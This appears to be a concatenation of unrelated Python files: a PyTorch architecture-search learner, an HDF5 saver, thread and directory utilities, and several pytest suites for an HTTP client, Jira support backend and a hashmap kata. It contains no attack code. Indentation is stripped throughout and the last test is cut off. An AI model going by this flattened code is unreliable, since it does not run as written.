import torch.optim as optim
# from tensorboardX import SummaryWriter
import os
import logging
from utils.utils import *
from utils.compute_flops import lookup_table_flops
from utils.transfer_archs import decode_cfg
import torch.distributed as dist
from utils.dist_utils import *
import time
import pickle
from pdb import set_trace as br
class Architect(nn.Module):
def __init__(self, model, args):
super(Architect, self).__init__()
self.args = args
self.model = model
# flops table loaded inside the learner
self.optimizer = torch.optim.Adam(list(self.model.arch_parameters()),
lr=args.arch_learning_rate, betas=(0.5, 0.999),
weight_decay=args.arch_weight_decay)
self.baseline = torch.tensor(0.).cuda()
self.gamma = args.gamma
def update_baseline(self, reward_raw):
self.baseline = self.baseline * self.gamma + reward_raw * (1-self.gamma)
def step(self, archs_logP, reduced_acc1, archs_entropy, arch_tmp):
# NOTE: only update rl agent on rank 0
policy_loss, reward_raw = self.model._loss_arch(archs_logP, reduced_acc1, archs_entropy, arch_tmp, self.baseline)
if self.args.rank == 0:
self.optimizer.zero_grad()
policy_loss.backward()
self.optimizer.step()
self.update_baseline(reward_raw)
if self.args.distributed:
# sync baseline and arch master
dist.barrier()
dist.broadcast(self.baseline, 0)
broadcast_params(self.model.arch_master)
# check passed. params are the same on multiple GPU
return reward_raw
class ChannIlsvrcLearner(object):
def __init__(self, model, loaders, args, device):
self.args = args
self.device = device
self.model = model
self.proj_lr = 0. # initially do not change P,Q
self.__build_path()
self.train_loader, self.test_loader = loaders
# self.writer = SummaryWriter(os.path.dirname(self.save_path))
self.__build_learner()
def __build_learner(self):
# split variables to weights and arch_params
self.__setup_optim()
self.architect = Architect(self.model, self.args)
self.criterion = nn.CrossEntropyLoss().cuda()
def train(self, samplers):
train_sampler = samplers
self.model.arch_master.force_uniform = True # initially random sample for warmup
for epoch in range(self.args.epochs):
if self.args.distributed:
assert train_sampler is not None
train_sampler.set_epoch(epoch)
if epoch > self.args.warmup_epochs:
self.model.arch_master.force_uniform = False
if self.args.ft_schedual == 'follow_meta':
self.proj_opt.param_groups[0]['lr'] = self.proj_opt.param_groups[0]['lr'] # 0.001
elif self.args.ft_schedual == 'fixed':
self.proj_opt.param_groups[0]['lr'] = self.args.ft_proj_lr
else:
raise ValueError('Wrong Projection Fintuning Type!.')
self.model.train()
if self.check_is_primary():
logging.info("Training at Epoch: %d" % epoch)
train_acc, train_loss = self.epoch_train(epoch)
if self.lr_scheduler:
self.lr_scheduler.step()
# in ilsvrc learner we warmup in advance. and (epoch > self.args.warmup_epochs):
if (epoch + 1) % self.args.eval_epoch == 0:
if self.check_is_primary():
self.save_model()
logging.info("Evaluation at Epoch: %d" % epoch)
if (epoch + 1) == self.args.epochs//2 and self.args.warmup_epochs == self.args.epochs:
# NOTE: store a 0.1 lr model separately
self.save_model('model_0.1.pt')
logging.info("Init lr model saved")
if self.args.distributed:
dist.barrier()
self.evaluate(True, epoch)
def finetune(self, samplers):
train_sampler = samplers
self.load_model()
self.evaluate(True, 0)
for epoch in range(self.args.epochs):
if self.args.distributed:
assert train_sampler is not None
train_sampler.set_epoch(epoch)
if epoch > self.args.warmup_epochs:
self.model.arch_master.force_uniform = False
if self.args.ft_schedual == 'follow_meta':
self.proj_opt.param_groups[0]['lr'] = self.proj_opt.param_groups[0]['lr'] # 0.001
elif self.args.ft_schedual == 'fixed':
self.proj_opt.param_groups[0]['lr'] = self.args.ft_proj_lr
else:
raise ValueError('Wrong Projection Fintuning Type!.')
self.model.train()
if self.check_is_primary():
logging.info("Finetuning at Epoch: %d" % epoch)
ft_acc, ft_loss = self.epoch_train(epoch)
if self.lr_scheduler:
self.lr_scheduler.step()
if (epoch + 1) % self.args.eval_epoch == 0:
if self.check_is_primary():
self.save_model()
logging.info("Evaluation at Epoch: %d" % epoch)
if self.args.distributed:
dist.barrier()
self.evaluate(True, epoch)
def evaluate(self, is_train=False, epoch=None):
self.model.eval()
if self.args.distributed:
sync_bn_stat(self.model, self.args.world_size)
if not is_train:
self.load_model()
with torch.no_grad():
if self.args.beam_search:
self.beam_search_eval()
# self.epoch_eval(epoch)
else:
self.epoch_eval(epoch)
def misc(self):
# check ilsvrc data
total_idx = len(self.train_loader)
for idx, (data_train, data_valid) in enumerate(zip(self.train_loader, self.valid_loader)):
input_x, target_y = data_train[0].to(self.device), data_train[1].to(self.device)
input_search, target_search = data_valid[0].to(self.device), data_valid[1].to(self.device)
if idx % 100 == 0:
print("Reading... %.2f complete" % float(idx/total_idx))
print("All input passed")
def epoch_train(self, epoch):
""" Rewrite this function if necessary in the sub-classes. """
# setup statistics
batch_time = AverageMeter('Time', ':3.3f')
# data_time = AverageMeter('Data', ':6.3f')
lr = AverageMeter('Lr', ':.3e')
losses = AverageMeter('Loss', ':.4e')
losses_ce = AverageMeter('Loss_ce', ':.4e')
losses_proj = AverageMeter('Loss_proj', ':.4e')
# penalty = AverageMeter('Penalty', ':.4e')
# flops = AverageMeter('Decode FLOPs', ':.4e')
rewards = AverageMeter('Controller reward', ':.4e')
entropy = AverageMeter('Entropy', ':.4e')
top1 = AverageMeter('Acc@1', ':3.3f')
top5 = AverageMeter('Acc@5', ':3.3f')
metrics = [lr, batch_time, top1, top5, losses, losses_ce, losses_proj, rewards, entropy]
loader_len = len(self.train_loader)
progress = ProgressMeter(loader_len, *metrics, prefix='Job id: %s, ' % self.args.job_id)
end = time.time()
for idx, data_train in enumerate(self.train_loader):
input_x, target_y = data_train[0].to(self.device), data_train[1].to(self.device)
logits, archs_logP, archs_entropy, arch_tmp = self.model(input_x)
# check passed: archs are all the same across multiple GPUS.
# NOTE: archs_entropy and logP may be different, but we only update
# arch_master on rank==0.
loss_ce = self.criterion(logits, target_y) / self.args.world_size
acc1, acc5 = accuracy(logits, target_y, topk=(1, 5))
reduced_loss_ce = loss_ce.data.clone()
reduced_acc1 = acc1.clone() / self.args.world_size
reduced_acc5 = acc5.clone() / self.args.world_size
if self.args.distributed:
dist.all_reduce(reduced_loss_ce)
dist.all_reduce(reduced_acc1)
dist.all_reduce(reduced_acc5)
# NOTE: policy_loss and loss_ce, loss_proj are w.r.t different graphs.
# Therefore freeing graph for policy_loss does not affect loss_ce
# and loss_proj`
# update alpha on validation set after warmup
if epoch > self.args.warmup_epochs:
reward_raw = self.architect.step(archs_logP, reduced_acc1, archs_entropy, arch_tmp)
rewards.update(reward_raw.item(), n=1)
entropy.update(archs_entropy.item(), n=1)
# update meta and projection weights
self.opt.zero_grad()
loss_ce.backward()
if self.args.distributed:
average_group_gradients(self.model.meta_parameters())
self.opt.step()
if idx % self.args.updt_proj == 0:
# NOTE: now we update orthogonal loss seperately inside
loss_proj = self.model.updt_orthogonal_reg_loss(self.proj_opt) # return a python scalar
# project back to unit lenght after warmup
if self.args.norm_constraint == 'constraint' and self.proj_opt.param_groups[0]['lr'] > 0:
for k, v in self.model.named_projection_parameters():
v_sum = v.transpose(1, 0).mm(v).sqrt().diag()
v_sum = v_sum.repeat(v.size(0), 1)
v.data = (v / v_sum).data
elif self.args.norm_constraint != 'constraint':
raise ValueError
# update statistics
top1.update(reduced_acc1[0].item(), input_x.shape[0])
top5.update(reduced_acc5[0].item(), input_x.shape[0])
losses.update(loss_proj+reduced_loss_ce.item(), input_x.shape[0])
losses_ce.update(reduced_loss_ce.item(), input_x.shape[0])
losses_proj.update(loss_proj, input_x.shape[0])
lr.update(self.opt.param_groups[0]['lr'])
batch_time.update(time.time() - end)
end = time.time()
# show the training/evaluating statistics
if self.check_is_primary() and ((idx % self.args.print_freq == 0) or (idx + 1) % loader_len == 0):
progress.show(idx)
return top1.avg, losses.avg
def beam_search_eval(self, epoch=None):
best_acc = -np.inf
# best_loss = np.inf
best_arch_logP = None
best_arch_ent = None
best_arch = None
best_logits = None
beam_size = self.args.top_seq
cand_seq, logits_seq, logP_accum, entropy_accum = self.model.arch_master.beam_search(beam_size)
if self.args.distributed:
dist.broadcast(cand_seq, 0)
# NOTE: archs_seq are the same, no noed to broadcase
# print(self.args.rank, logits_seq[0])
# dist.broadcast(logits_seq, 0)
dist.broadcast(logP_accum, 0)
dist.broadcast(entropy_accum, 0)
parallel_eval = True if self.args.distributed and beam_size%self.args.world_size==0 and not self.args.fix_random \
else False
if parallel_eval:
idx = 0
while idx < beam_size:
top1 = AverageMeter('cand top1', ':3.3f')
arch_id = idx + self.args.rank
cand = cand_seq[arch_id]
# arch = [self.model.candidate_width[v] for v in cand]
# print("On rank: %d, Evaluating the %d-th arch, archs: %s" % (self.args.rank, arch_id, str(cand)))
print("On rank: %d, %d-th Arch: %s" % (self.args.rank, arch_id, \
decode_cfg(self.args, cand, self.model.num_blocks, self.model.block_layer_num)))
# NOTE: comment this for fast eval
for test_input, test_target in self.test_loader:
test_input, test_target = test_input.to(self.device), test_target.to(self.device)
logits = self.model.test_forward(test_input, cand)
acc = accuracy(logits, test_target)[0]
top1.update(acc.item(), test_input.size(0))
flops = self.model.arch_master._compute_flops(cand)
# print all the sampled archs in parallel
print("Rank: %d, Arch id:%d, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(self.args.rank, arch_id, top1.avg, logP_accum[arch_id].item(), entropy_accum[arch_id].item(), flops))
# init group vars to be gathered
top1 = torch.tensor(top1.avg).float().cuda()
g_top1 = [torch.ones_like(top1) for _ in range(self.args.world_size)]
# collect results on different GPUs
dist.all_gather(g_top1, top1)
if self.check_is_primary():
max_ind = np.argmax(g_top1)
if g_top1[max_ind] > best_acc:
best_acc = g_top1[max_ind]
best_arch = cand
best_arch_logP = logP_accum[idx+max_ind].item()
best_arch_ent = entropy_accum[idx+max_ind].item()
idx += self.args.world_size
else:
if self.check_is_primary():
for idx, cand in enumerate(cand_seq):
# enumerate over each cand arch and perform testing
top1 = AverageMeter('cand top1', ':3.3f')
# NOTE: comment this for fast eval
for test_input, test_target in self.test_loader:
test_input, test_target = test_input.to(self.device), test_target.to(self.device)
logits = self.model.test_forward(test_input, cand)
acc = accuracy(logits, test_target)[0]
top1.update(acc.item(), test_input.size(0))
flops = self.model.arch_master._compute_flops(cand)
# print all the sampled archs on primary rank
print("%d-th Arch: %s" % (idx, decode_cfg(self.args, cand, self.model.num_blocks, self.model.block_layer_num)))
print("Arch id:%d, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(idx, top1.avg, logP_accum[idx].item(), entropy_accum[idx].item(), flops))
if top1.avg > best_acc:
best_acc = top1.avg
best_arch = cand
best_arch_logP = logP_accum[idx].item()
best_arch_ent = entropy_accum[idx].item()
if self.check_is_primary() and self.model.num_cand> 1:
avg_logits = [torch.stack(logits) for logits in logits_seq]
avg_logits = torch.stack(avg_logits).mean(0)
avg_arch_info, avg_discrepancy = self.model.get_arch_info(avg_logits)
print(avg_arch_info)
logging.info("Best: Accuracy %f -LogP %f ENT %f",best_acc, -best_arch_logP, best_arch_ent)
logging.info("Best Arch: %s" % str(best_arch))
logging.info("Beam search done. size: %d" % beam_size)
# sync back
if self.args.distributed:
dist.barrier()
def epoch_eval(self, epoch):
best_acc = -np.inf
# best_loss = np.inf
best_arch_logP = None
best_arch_ent = None
best_arch = None
avg_logits_list = []
parallel_eval = True if self.args.distributed and \
self.args.n_test_archs % self.args.world_size == 0 and not self.args.fix_random \
else False
if parallel_eval:
# NOTE: a new parallel way to perform evaluation with differet arch
if self.check_is_primary():
logging.info("Now parallel evaluating different archs")
idx = 0
while (idx<self.args.n_test_archs):
top1, arch_cand, arch_logP, arch_entropy, arch_info, discrepancy = self.model.test_cand_arch(self.test_loader)
flops = self.model.arch_master._compute_flops(arch_cand)
# logging.info("Rank:%d, Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
# (self.args.rank, idx+self.args.rank, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs
print("Rank:%d, Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(self.args.rank, idx+self.args.rank, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs
dist.barrier()
idx += self.args.world_size
top1 = torch.tensor(top1).float().cuda()
# init group vars to be gathered
g_top1 = [torch.ones_like(top1) for _ in range(self.args.world_size)]
g_logits = [torch.ones_like(self.model.logits) for _ in range(self.args.world_size)]
g_arch_cand = [torch.ones_like(arch_cand) for _ in range(self.args.world_size)]
g_entropy = [torch.ones_like(arch_entropy) for _ in range(self.args.world_size)]
g_arch_logP = [torch.ones_like(arch_logP) for _ in range(self.args.world_size)]
# collect results on different GPUs
dist.all_gather(g_top1, top1)
dist.all_gather(g_arch_logP, arch_logP)
dist.all_gather(g_entropy, arch_entropy)
dist.all_gather(g_arch_cand, arch_cand)
dist.all_gather(g_logits, self.model.logits)
if self.check_is_primary():
avg_logits_list += g_logits
max_ind = np.argmax(g_top1)
if g_top1[max_ind] > best_acc:
best_acc = g_top1[max_ind]
best_arch = g_arch_cand[max_ind]
best_arch_logP = g_arch_logP[max_ind]
best_arch_ent = g_entropy[max_ind]
dist.barrier()
else:
if self.check_is_primary():
# sample 20 archs and take the best one.
logging.info("Single model evluating...")
for i in range(self.args.n_test_archs):
top1, arch_cand, arch_logP, arch_entropy, arch_info, discrepancy = self.model.test_cand_arch(self.test_loader)
flops = self.model.arch_master._compute_flops(arch_cand)
logging.info("Arch: %s", decode_cfg(self.args, arch_cand, self.model.num_blocks, self.model.block_layer_num))
logging.info("Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \
(i, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs
avg_logits_list.append(self.model.logits)
if top1 > best_acc:
best_acc = top1
best_arch = arch_cand
best_arch_logP = arch_logP
best_arch_ent = arch_entropy
if self.check_is_primary() and self.model.num_cand > 1:
avg_logits = torch.stack(avg_logits_list)
avg_arch_info, avg_discrepancy = self.model.get_arch_info(avg_logits.mean(0))
print(avg_arch_info)
logging.info("Best: Accuracy %f -LogP %f ENT %f",best_acc,
-best_arch_logP, best_arch_ent)
logging.info("Best Arch: %s", decode_cfg(self.args, best_arch, self.model.num_blocks, self.model.block_layer_num))
logging.info("Random sample evaluation done.")
# sync back
if self.args.distributed:
dist.barrier()
def __setup_optim(self):
""" Set up optimizer for network parameters and projection matrix seperately (not arch parameters) """
self.opt = optim.SGD(self.model.meta_parameters(), lr=self.args.lr, momentum=self.args.momentum, \
nesterov=self.args.nesterov, weight_decay=self.args.weight_decay)
self.proj_opt = optim.SGD(self.model.projection_parameters(), lr=self.proj_lr, momentum=self.args.momentum, \
nesterov=self.args.nesterov, weight_decay=self.args.weight_decay)
# proj_lr is adjusted in self.train()
if self.args.lr_decy_type == 'multi_step':
self.lr_scheduler = optim.lr_scheduler.MultiStepLR(self.opt, milestones=[\
int(self.args.epochs * 0.5), int(self.args.epochs * 0.75)])
elif self.args.lr_decy_type == 'cosine':
self.lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(\
self.opt, self.args.epochs, eta_min=self.args.lr_min)
else:
raise ValueError("Unknown model, failed to initalize optim")
def __build_path(self):
if self.args.exec_mode == 'train':
self.save_path = os.path.join(self.args.save_path,
'_'.join([self.args.model_type, self.args.learner]),
self.args.job_id, 'model.pt')
self.load_path = self.save_path
elif self.args.exec_mode == 'finetune':
self.load_path = self.args.load_path
if self.args.warmup_epochs == self.args.epochs:
# further warmup with decayed learning rate
self.save_path = os.path.join(os.path.dirname(self.load_path), 'model_ft_%s.pt' % self.args.job_id)
else:
self.save_path = os.path.join(os.path.dirname(self.load_path), 'model_search_%s.pt' % self.args.job_id)
else:
self.load_path = self.args.load_path
self.save_path = self.load_path
def check_is_primary(self):
if (self.args.distributed and self.args.rank == 0) or \
not self.args.distributed:
return True
else:
return False
def save_model(self, file_name=None):
if file_name is None:
file_name = self.save_path
else:
file_name = os.path.join(os.path.dirname(self.save_path), file_name)
state = {'state_dict': self.model.state_dict(), \
'optimizer': self.opt.state_dict(), \
'arch_optimizer': self.architect.optimizer.state_dict()}
torch.save(state, file_name)
logging.info("Model stored at: " + file_name)
def load_model(self):
if self.args.distributed:
# read parameters to each GPU seperately
loc = 'cuda:{}'.format(torch.cuda.current_device())
checkpoint = torch.load(self.load_path, map_location=loc)
else:
checkpoint = torch.load(self.load_path)
self.model.load_state_dict(checkpoint['state_dict'])
# NOTE: for wamrup, useless to restore optimizer params.
# self.opt.load_state_dict(checkpoint['optimizer'])
# self.architect.optimizer.load_state_dict(checkpoint['arch_optimizer'])
logging.info("Model succesfully restored from %s" % self.load_path)
if self.args.distributed:
broadcast_params(self.model)
|
497865 | import numpy as np
import pdb
import h5py
import os
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from recursive_planning.infra.datasets.save_util.record_saver import HDF5SaverBase
from utils import AttrDict
def pad_traj_timesteps(traj, max_num_actions):
"""
pad images and actions with zeros
:param traj:
:param max_num_actions:
:return:
"""
im_shape = traj.images.shape
ac_shape = traj.actions.shape
if ac_shape[0] < max_num_actions:
zeros = np.zeros([max_num_actions - im_shape[0] + 1, im_shape[1], im_shape[2], im_shape[3], im_shape[4]], dtype=np.uint8)
traj.images = np.concatenate([traj.images, zeros])
if len(ac_shape) > 1:
zeros = np.zeros([max_num_actions - ac_shape[0], ac_shape[1]])
else:
zeros = np.zeros([max_num_actions - ac_shape[0]])
traj.actions = np.concatenate([traj.actions, zeros])
assert traj.images.shape[0] == max_num_actions + 1
assert traj.actions.shape[0] == max_num_actions
return traj
def get_pad_mask(action_len, max_num_actions):
"""
create a 0/1 mask with 1 where there are images and 0 where there is padding
:param action_len: the number of actions in trajectory
:param max_num_actions: maximum number of actions allowed
:return:
"""
if action_len < max_num_actions:
mask = np.concatenate([np.ones(action_len + 1), np.zeros(max_num_actions - action_len)])
elif action_len == max_num_actions:
mask = np.ones(max_num_actions + 1)
else:
raise ValueError
assert mask.shape[0] == max_num_actions + 1
return mask
class HDF5Saver(HDF5SaverBase):
def __init__(self, save_dir, envparams, agentparams, traj_per_file,
offset=0, split=(0.90, 0.05, 0.05), split_train_val_test=True):
if hasattr(agentparams, 'max_num_actions'):
self.max_num_actions = envparams.max_num_actions
else:
self.max_num_actions = agentparams.T
super().__init__(save_dir, traj_per_file, offset, split, split_train_val_test)
def _save_manifests(self, agent_data, obs, policy_out):
pass
def make_traj(self, obs, policy_out):
traj = AttrDict()
traj.images = obs['images']
traj.states = obs['state']
action_list = [action['actions'] for action in policy_out]
traj.actions = np.stack(action_list, 0)
traj.pad_mask = get_pad_mask(traj.actions.shape[0], self.max_num_actions)
traj = pad_traj_timesteps(traj, self.max_num_actions)
return traj
def save_traj(self, itr, agent_data, obs, policy_out):
traj = self.make_traj(obs, policy_out)
self._save_traj(traj) |
497875 | import os, threading, abc, time
class TimedIterateThread(threading.Thread):
__metaclass__ = abc.ABCMeta
def __init__(self, iter_sleep = None):
super(TimedIterateThread, self).__init__()
self.exit = threading.Event()
self.iter_sleep = iter_sleep
@abc.abstractmethod
def iterate(self):
pass
@abc.abstractmethod
def cleanup(self):
pass
def run(self):
while not self.exit.is_set():
self.iterate()
if self.iter_sleep is not None:
time.sleep(self.iter_sleep)
self.cleanup()
def shutdown(self):
self.exit.set()
self.join()
def create_log_directory(log_directory):
# Log directory might refer to ~
log_directory = os.path.expanduser(log_directory)
if not os.path.exists(log_directory):
print "Creating %s" % log_directory
os.makedirs(log_directory)
for sub_directory in ["node_coordinators", "run_logs"]:
directory = os.path.join(log_directory, sub_directory)
if not os.path.exists(directory):
print "Creating %s" % directory
os.makedirs(directory)
return log_directory
def create_batch_directory(log_directory, batch_id):
batch_directory = os.path.join(
log_directory, "run_logs", "batch_%d" % batch_id)
if not os.path.exists(batch_directory):
os.makedirs(batch_directory)
return batch_directory
|
497895 | import pytest
from studying.shipment import RecordShipment
pytestmark = [pytest.mark.django_db]
@pytest.fixture
def course(mixer):
return mixer.blend('products.Course', name='Кройка и шитьё', name_genitive='Кройки и шитья')
@pytest.fixture
def record(mixer, course):
return mixer.blend('products.Record', course=course)
@pytest.fixture
def order(factory, record):
return factory.order(item=record)
@pytest.fixture
def shipment(user, record, order):
return RecordShipment(user=user, product=record, order=order)
|
497912 | from invoke import run
def print_and_run(cmd, **run_kwargs):
print(cmd)
return run(cmd, **run_kwargs)
|
497926 | import pytest
from blacksheep.client import ClientSession, ConnectionTimeout, RequestTimeout
from . import FakePools
@pytest.mark.asyncio
async def test_connection_timeout():
fake_pools = FakePools([])
fake_pools.pool.sleep_for = (
5 # wait for 5 seconds before returning a connection; to test timeout handling
)
async with ClientSession(
base_url=b"http://localhost:8080",
pools=fake_pools,
connection_timeout=0.002, # 2ms - not realistic, but ok for this test
) as client:
with pytest.raises(ConnectionTimeout):
await client.get(b"/")
@pytest.mark.asyncio
async def test_request_timeout():
fake_pools = FakePools([])
fake_pools.pool.connection.sleep_for = (
5 # wait for 5 seconds before returning a response;
)
async with ClientSession(
base_url=b"http://localhost:8080",
pools=fake_pools,
request_timeout=0.002, # 2ms - not realistic, but ok for this test
) as client:
with pytest.raises(RequestTimeout):
await client.get(b"/")
|
497936 | import os
c = get_config()
c.JupyterHub.spawner_class = 'marathonspawner.MarathonSpawner'
c.JupyterHub.ip = '0.0.0.0'
c.JupyterHub.hub_ip = '0.0.0.0'
c.JupyterHub.cmd = 'start-singleuser.sh'
c.JupyterHub.cleanup_servers = False
c.MarathonSpawner.app_prefix = 'jupyter'
c.MarathonSpawner.app_image = 'jupyterhub/singleuser'
c.MarathonSpawner.app_prefix = 'jupyter'
c.MarathonSpawner.marathon_host = 'http://leader.mesos:8080'
c.MarathonSpawner.ports = [8000]
c.MarathonSpawner.mem_limit = '2G'
c.MarathonSpawner.cpu_limit = 1
c.JupyterHub.authenticator_class = 'dummyauthenticator.DummyAuthenticator'
|
497952 | import json
from unittest import mock, skip
import jira
from django.test import TestCase
from django.utils import timezone
from jira import User
from waldur_core.core.utils import datetime_to_timestamp
from waldur_mastermind.support import models
from waldur_mastermind.support.backend.atlassian import ServiceDeskBackend
from waldur_mastermind.support.tests import factories, fixtures
from waldur_mastermind.support.tests.base import load_resource
class BaseBackendTest(TestCase):
def setUp(self):
super(BaseBackendTest, self).setUp()
self.fixture = fixtures.SupportFixture()
self.backend = ServiceDeskBackend()
jira_patcher = mock.patch('waldur_jira.backend.JIRA')
self.mocked_jira = jira_patcher.start()()
self.mocked_jira.fields.return_value = json.loads(
load_resource('jira_fields.json')
)
mock_backend_users = [
User({'server': ''}, None, raw={'key': 'user_1', 'active': True})
]
self.mocked_jira.waldur_search_users.return_value = mock_backend_users
def tearDown(self):
super(BaseBackendTest, self).tearDown()
mock.patch.stopall()
class IssueCreateTest(BaseBackendTest):
def setUp(self):
super(IssueCreateTest, self).setUp()
issue = self.fixture.issue
issue.type = 'Task'
issue.priority = 'Major'
issue.save()
self.issue = issue
factories.RequestTypeFactory(issue_type_name=issue.type)
self.mocked_jira.waldur_create_customer_request.return_value = mock.Mock(
**{
'key': 'TST-101',
'fields.assignee.key': '',
'fields.assignee.name': '',
'fields.assignee.emailAddress': '',
'fields.assignee.displayName': '',
'fields.creator.key': '',
'fields.creator.name': '',
'fields.creator.emailAddress': '',
'fields.creator.displayName': '',
'fields.reporter.key': '',
'fields.reporter.name': '',
'fields.reporter.emailAddress': '',
'fields.reporter.displayName': '',
'fields.resolutiondate': '',
'fields.summary': '',
'fields.description': '',
'fields.status.name': '',
'fields.resolution': '',
'fields.priority.name': 'Major',
'fields.issuetype.name': 'Task',
'fields.field103.ongoingCycle.breachTime.epochMillis': 1000, # SLA
'fields.field104': 'Critical', # Impact
'permalink()': '',
}
)
self.mocked_jira.waldur_create_customer_request.return_value.permalink.return_value = (
'http://example.com/TST-101'
)
def test_user_for_caller_is_created(self):
self.mocked_jira.waldur_search_users.return_value = []
self.backend.create_issue(self.issue)
self.mocked_jira.create_customer.assert_called_once_with(
self.issue.caller.email, self.issue.caller.full_name
)
@skip(
'Skip till the correct behaviour for requestParticipant reference is assured.'
)
def test_caller_is_specified_in_custom_field(self):
self.backend.create_issue(self.issue)
kwargs = self.mocked_jira.create_customer_request.call_args[0][0]
self.assertEqual(
kwargs['requestParticipants'],
[self.issue.caller.supportcustomer.backend_id],
)
def test_original_reporter_is_specified_in_custom_field(self):
self.backend.create_issue(self.issue)
kwargs = self.mocked_jira.waldur_create_customer_request().update.call_args[1]
self.assertEqual(kwargs['field102'], self.issue.reporter.name)
class IssueUpdateTest(BaseBackendTest):
def setUp(self):
super(IssueUpdateTest, self).setUp()
self.mocked_jira.issue.return_value = mock.Mock(
**{
'key': 'TST-101',
'fields.assignee.key': '',
'fields.assignee.name': '',
'fields.assignee.emailAddress': '',
'fields.assignee.displayName': '',
'fields.creator.key': '',
'fields.creator.name': '',
'fields.creator.emailAddress': '',
'fields.creator.displayName': '',
'fields.reporter.key': '',
'fields.reporter.name': '',
'fields.reporter.emailAddress': '',
'fields.reporter.displayName': '',
'fields.resolutiondate': '',
'fields.summary': '',
'fields.description': '',
'fields.status.name': '',
'fields.resolution': '',
'fields.priority.name': 'Major',
'fields.issuetype.name': 'Task',
'fields.field103.ongoingCycle.breachTime.epochMillis': 1000, # SLA
'fields.field104': 'Critical', # Impact
}
)
self.mocked_jira.issue.return_value.permalink.return_value = (
'http://example.com/TST-101'
)
def test_sla_is_populated(self):
# Arrange
issue = self.fixture.issue
dt = timezone.now().replace(microsecond=0)
ts = datetime_to_timestamp(dt) * 1000
self.mocked_jira.issue.return_value.fields.field103.ongoingCycle.breachTime.epochMillis = (
ts
)
# Act
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
# Assert
self.assertEqual(issue.first_response_sla, dt)
def test_assignee_is_populated(self):
issue = self.fixture.issue
self.mocked_jira.issue.return_value.fields.assignee.key = '<EMAIL>'
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
self.assertEqual(issue.assignee.backend_id, '<EMAIL>')
def test_reporter_is_populated(self):
issue = self.fixture.issue
self.mocked_jira.issue.return_value.fields.reporter.key = '<EMAIL>'
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
self.assertEqual(issue.reporter.backend_id, '<EMAIL>')
def test_issue_is_resolved(self):
issue = self.fixture.issue
resolution_date = timezone.now()
self.mocked_jira.issue.return_value.fields.status.name = 'Resolved'
self.mocked_jira.issue.return_value.fields.resolutiondate = resolution_date
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
self.assertEqual(issue.resolution_date, resolution_date)
class CommentCreateTest(BaseBackendTest):
def setUp(self):
super(CommentCreateTest, self).setUp()
self.comment = self.fixture.comment
class Response:
status_code = 201
def json(self):
return {'id': '10001'}
self.mocked_jira._session.post.return_value = Response()
def create_comment(self):
self.backend.create_comment(self.comment)
kwargs = self.mocked_jira._session.post.call_args[1]
data = json.loads(kwargs['data'])
return data
def test_backend_id_is_populated(self):
self.create_comment()
self.comment.refresh_from_db()
self.assertEqual(self.comment.backend_id, '10001')
def test_original_author_is_specified(self):
self.comment.description = 'Comment description'
self.comment.save()
user = self.comment.author.user
user.full_name = '<NAME>'
user.civil_number = None
user.save()
data = self.create_comment()
self.assertEqual('[Alice Lebowski]: Comment description', data['body'])
def test_internal_flag_is_specified(self):
self.comment.is_public = False
self.comment.save()
data = self.create_comment()
expected = [{'key': 'sd.public.comment', 'value': {'internal': True}}]
self.assertEqual(expected, data['properties'])
def test_of_author_when_create_comment_from_jira(self):
issue = factories.IssueFactory()
backend_comment_raw = json.loads(load_resource('jira_comment_raw.json'))
self.backend_comment = jira.resources.Comment(
{'server': 'example.com'}, None, backend_comment_raw
)
self.mocked_jira.comment.return_value = self.backend_comment
self.backend.create_comment_from_jira(issue, self.backend_comment.id)
comment = models.Comment.objects.get(issue=issue)
self.assertEqual(comment.author.backend_id, 'user')
class CommentUpdateTest(BaseBackendTest):
def setUp(self):
super(CommentUpdateTest, self).setUp()
self.mocked_jira.comment.return_value = mock.Mock(
**{
'body': '[<NAME>]: New comment description',
'author': mock.Mock(**{'key': '<EMAIL>'}),
}
)
self.mocked_jira._session.get.return_value.json.return_value = {
'value': {'internal': True}
}
def test_description_is_updated(self):
# Arrange
comment = self.fixture.comment
comment.description = 'Old comment description'
comment.save()
# Act
self.backend.update_comment_from_jira(comment)
# Assert
comment.refresh_from_db()
self.assertEqual(comment.description, 'New comment description')
def test_author_is_populated(self):
comment = self.fixture.comment
self.backend.update_comment_from_jira(comment)
comment.refresh_from_db()
self.assertEqual(comment.author.backend_id, '<EMAIL>')
def test_internal_flag_is_updated(self):
# Arrange
comment = self.fixture.comment
comment.is_public = True
comment.save()
# Act
self.backend.update_comment_from_jira(comment)
# Assert
comment.refresh_from_db()
self.assertFalse(comment.is_public)
|
497976 | import unittest
from dojo import *
class DojoTest(unittest.TestCase):
def test_true(self):
self.assertTrue(main())
def teste_hash_1(self):
self.assertEqual(MyHashMap._hash(53), 5)
def teste_hash_2(self):
self.assertEqual(MyHashMap._hash(56), 0)
def test_get_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
self.assertEqual(my_hmap.get(53), "Olá")
def teste_get_2(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(54, "Tudo bem")
self.assertEqual(my_hmap.get(54), "Tudo bem")
def teste_get_3(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(54, "Tudo bem")
self.assertEqual(my_hmap.get(5), None)
# def teste_len_1(self):
# my_hmap = MyHashMap()
# my_hmap.set(53, "Olá")
# my_hmap.set(54, "Tudo bem")
# self.assertEqual(my_hmap.len(), 2)
def teste_len_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(54, "Tudo bem")
self.assertEqual(len(my_hmap), 2)
def teste_repeated_1(self):
